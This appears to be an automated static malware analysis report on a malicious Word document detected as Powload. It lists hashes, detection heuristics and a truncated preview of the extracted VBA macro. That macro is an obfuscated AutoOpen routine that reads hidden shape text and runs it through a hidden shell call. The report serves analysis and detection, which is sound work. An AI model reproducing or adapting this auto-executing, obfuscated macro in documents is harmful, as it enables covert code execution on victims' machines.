Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a14871d7f2f534f2…

MALICIOUS

Office (OLE)

81.5 KB Created: 2018-11-21 06:42:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 86f72443d93a3e9826d4f85d3203c180 SHA-1: ecdebae2573fb9980269008bd0ef6f104a4943a0 SHA-256: a14871d7f2f534f235fdeeaf10c5176b13e23e47c6bd292eb7749fa13115ed6a
Risk score: 142

Heuristics (5)

  • ClamAV: Doc.Malware.Powload-6769687-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6769687-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4306 bytes
SHA-256: 7fbf7dc8e951736d294b1114525f235cda0363fe91fc9409f355a76c5293eba7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zwPnbaPMhczl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      If ZCiBhH Xor uInZdTbp Then
         OOiUMEjv = ZodiGjUMt
      End If
      If zPYVaNm Xor MawCWdXpb Then
         VDVTmK = Sgn(TILBE)
      End If
   QawsT = (tDHaLWVs - CDbl(150277218) / ALRIHq + Sgn(278563017)) - 47311996 + CInt(cOMHFar) - 54465941 * Fix(144760076 * Oct(bXlEziJO))
Set KwRRlBH = kvwaj
   On Error Resume Next
      If HstSVzzWv Xor fdFpFaMB Then
         CCNstrY = RlFwtpkw
      End If
      If foqaK Xor lqiwwYG Then
         ijrFo = Sgn(zAazPjkqi)
      End If
   oUqAvXLA = (hcCLvbLKk - CDbl(172382060) / BkwFFf + Sgn(89651851)) - 299177737 + CInt(dlvHwH) - 182826472 * Fix(221759001 * Oct(GHVrM))
Set RzofV = VAPQk
   On Error Resume Next
      If iMRmZbN Xor atzcIT Then
         AvvcAcWr = DQiqGn
      End If
      If dkHZonU Xor sDnVjnGk Then
         vqizb = Sgn(sLUEi)
      End If
   zXKnP = (sAtwNa - CDbl(66863167) / zpBLZzfc + Sgn(306548141)) - 106556964 + CInt(iBfPN) - 127064939 * Fix(226929804 * Oct(cvfchRTN))
Set IzdIprGD = JfldUc
Set luQKRpP = Shapes("CzQrEcTFJitGM")
   On Error Resume Next
      If dzSZd Xor FhkFri Then
         EDtfUiZhk = QPdcjw
      End If
      If VTAuBiFSi Xor JfQMEz Then
         YYmMLp = Sgn(VslBKziV)
      End If
   njYiACZo = (mUPCTB - CDbl(77296529) / QDLKlK + Sgn(196953408)) - 105972894 + CInt(JsDIifo) - 303291339 * Fix(195776193 * Oct(jTNWwwz))
Set UUTZkps = fJaBYuNb
   On Error Resume Next
      If llSWJZ Xor pFpzpNS Then
         sREvzrSdC = BuCUSBhDN
      End If
      If BnOTrr Xor OqvVV Then
         SCOuBRXTH = Sgn(bIfUUn)
      End If
   PlAAqECk = (GmEmG - CDbl(166585481) / AjSDHjmp + Sgn(339966249)) - 303437501 + CInt(nLMWlaD) - 212302905 * Fix(239322504 * Oct(tczLJz))
Set kOUJCc = kCjfjzK
   On Error Resume Next
      If mZbthHKCC Xor kzhto Then
         tHaiDEQ = ChqOiYmXT
      End If
      If YQVJUqAiA Xor GYrXhba Then
         GFuiJk = Sgn(zQwTiQNdj)
      End If
   YAjmjdV = (tkiqT - CDbl(218189850) / wTQNE + Sgn(278563470)) - 45899435 + CInt(SVZEOWGt) - 308049478 * Fix(56886329 * Oct(JaqfW))
Set YdPzMJz = MfwwPi
JFqoqY = "" + PYrjBdj + LGHUrzjb + luQKRpP.TextFrame.TextRange.Text + ZNljimi + zlJtfQ
   On Error Resume Next
      If NEdIzSwwd Xor wZFJQK Then
         izVWX = PioFXwnS
      End If
      If WjqzjTGc Xor hWFBPY Then
         BzJVBU = Sgn(pUOZINZ)
      End If
   qwKCZTSah = (UFoBdNT - CDbl(103084815) / VziwmBFAc + Sgn(140825602)) - 301666473 + CInt(OqjjHrMzv) - 229794781 * Fix(166257771 * Oct(wjOmoqA))
Set tXEwL = YBUTq
Interaction.Shell@ JFqoqY + GPFVVWG + mZCzFnTL, vbHide
   On Error Resume Next
      If lStFNifom Xor QqnbNUMLE Then
         zdUnj = zKVNRFbE
      End If
      If LXSuXnZPO Xor uMwCIGpL Then
         zIzGW = Sgn(jVSYaLO)
      End If
   kCzuRjNY = (FzocBH - CDbl(87704401) / ctZGh + Sgn(90160385)) - 112496190 + CInt(VrRGqncfc) - 78054875 * Fix(4112617 * Oct(MYioZu))
Set HhwfOFSwR = dCofwvpw
   On Error Resume Next
      If UmJStnYH Xor blUJQ Then
         DoPvsLc = UkkFzO
      End If
      If CzbiuLOd Xor aGHEtd Then
         NMutNzka = Sgn(rSohIhY)
      End If
   VYosaVSoK = (UmDXa - CDbl(285094034) / XtFUUDNBE + Sgn(23206099)) - 297834149 + CInt(wFthOjU) - 271929979 * Fix(298057731 * Oct(qbECzPna))
Set rzjlnT = BVbqWSZ
   On Error Resume Next
      If rEFAjnRZi Xor InfwvL Then
         BDQiXfwBS = AqrpcK
      End If
      If fjwXAwU Xor XKzBZ Then
         UzuizIK = Sgn(YHzRbR)
      End If
   nXjcHTMN = (BGvjzU - CDbl(333138980) / toftzHcBN + Sgn(71406598)) - 73289363 + CInt(XiVDSknSY) - 117909647 * Fix(28044609 * Oct(kahsN))
Set UDIzYml = pPDatIAV
   On Error Resume Next
      If QzcKSBjuW Xor cZtYQwYq Then
         VwzAwIn = ttJiG
      End If
      If zrXwaG Xor JMhrRdJYz Then
         wtsI
... (truncated)